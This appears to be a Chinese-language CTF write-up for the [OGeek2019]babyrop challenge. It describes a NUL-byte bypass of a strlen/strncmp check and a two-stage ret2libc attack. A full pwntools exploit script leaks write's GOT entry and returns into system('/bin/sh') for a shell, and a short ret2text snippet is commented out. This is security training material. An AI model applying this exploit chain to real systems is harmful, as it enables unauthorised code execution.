[OGeek2019]babyrop WP

发布于 2021-10-22  38 次阅读


打开后发现符号表被抹掉了

先获取一个4位宽的随机数

放到buf_main里面

buf_main传参给871F,跟进

检查字符长度

由于strlen遇到\0就会截断，长度被截断后strncmp的比较就被绕过了

返回值为buf_7，这个是可控的，暂时忽略，等构造payload的时候再关注具体的值

返回main

进87D0

通过控制a1的大小来控制read的长度，这里0xFF就很够用了

溢出方面,先把buf和osk溢出掉,rta控制为elf_write_plt

传参elf_write_plt(1,elf_write_got,0x4)

把write在got中的内容输出出来

得到libc_base_addr

再根据libc版本求sys_addr

脚本



#! python
# Exploit script for the [OGeek2019]babyrop challenge: a two-stage ret2libc.
# Stage 1 leaks write()'s GOT entry to locate libc; stage 2 returns into
# system("/bin/sh"). All offsets and addresses below are specific to this
# binary and the libc-2.23 build named in the writeup.
import os
# Tell pwntools not to take over the terminal (useful when run non-interactively).
os.environ['PWNLIB_NOTERM'] = '1'
from pwn import *
# log_level="debug" prints every byte sent/received, which is how the
# leaked pointer below can be inspected by hand.
context(os = 'linux', log_level="debug")
# NOTE: context.terminal is only consulted by gdb.attach(), which is commented out.
context.terminal=['konsole','--separate','-e','python']
# Re-bind the packers to the 32-bit versions explicitly; presumably to stay
# 32-bit regardless of context.arch (which is never set here).
p32 = lambda a : pwnlib.util.packing.p32(a)
u32 = lambda a : pwnlib.util.packing.u32(a)
# io=process("/home/ksroido/Downloads/pwn")
# Remote target from the CTF platform; swap for the local process() above to debug.
io=remote("node4.buuoj.cn",26061)
# gdb.attach(io,"b *0x08048825")
# The challenge binary (symbols stripped) and the libc the remote is assumed to run.
elf = ELF("/home/ksroido/Downloads/pwn")
libc = ELF("/home/ksroido/Downloads/libc-2.23.so")

# Offsets inside libc; they only become addresses once libc_base_addr is known.
libc_system = libc.symbols['system']
libc_sh = libc.search(b'/bin/sh').__next__()
libc_write = libc.symbols['write']

# Fixed address of main (the binary is loaded at a fixed base, so this is
# usable as a return target without a leak) and write's PLT/GOT slots.
main_addr = 0x08048825
elf_write_plt = elf.plt['write']
elf_write_got = elf.got['write']


# Stage 1a: pass the comparison. Per the writeup, the length check uses
# strlen(), so a leading NUL makes the checked length 0 and the strncmp is
# effectively skipped; the trailing 0xff bytes fill the rest of the buffer.
payload1 = b'\x00'+b'\xff'*0x7+b'\x00'
io.sendline(payload1)
io.recvuntil('Correct\n')
# Stage 1b: overflow 231 bytes of buffer + 4 bytes of saved frame pointer,
# then overwrite the return address with write@plt. The next dword is
# write's own return address (main, so we get a second round), followed by
# write's arguments: write(1, write@got, 4) -> leaks write's libc address.
payload2 = b'a'*231+b'b'*4
payload2 += p32(elf_write_plt)+p32(main_addr)
payload2 += p32(1)+p32(elf_write_got)+p32(0x4)
io.sendline(payload2)
# The 4 leaked bytes are the resolved address of write() inside libc.
temp = u32(io.recv(4))
print(hex(temp))
print(hex(libc_write))
# Rebase libc from the leak, then compute the two addresses stage 2 needs.
# If the remote libc differs from libc-2.23.so these will be wrong.
libc_base_addr = temp - libc_write
system_addr = libc_base_addr + libc_system
libc_sh_addr = libc_base_addr + libc_sh
# Stage 2a: we are back in main, so repeat the NUL-prefix bypass.
payload3=b'\x00'+b'\xff'*10
io.sendline(payload3)
io.recvuntil("Correct\n")

# Stage 2b: same 0xe7 (=231) + 4 byte distance to the return address as in
# payload2, then return into system().
payload4 = b'a'*(0xe7+4)+p32(system_addr)+p32(0)
# 0 is the padding value (the dword after system_addr; presumably the return
# address system() would use, which is never needed).

# The argument to system(): pointer to "/bin/sh" inside libc.
payload4 +=p32(libc_sh_addr)
io.sendline(payload4)



#-------------------------------------------------

# from pwn import *
# context(arch = 'i386' , os = 'linux', log_level="debug")
# context.terminal = "/bin/sh"
# sh=process("/home/ksroido/CTFtemp/ret2text")

# pause()
# target = 0x804863a
# sh.sendline(b'A' * (0x6c+4) + p32(target))
# sh.interactive()

#-------------------------------------------------


# Hand the spawned shell over to the user.
io.interactive()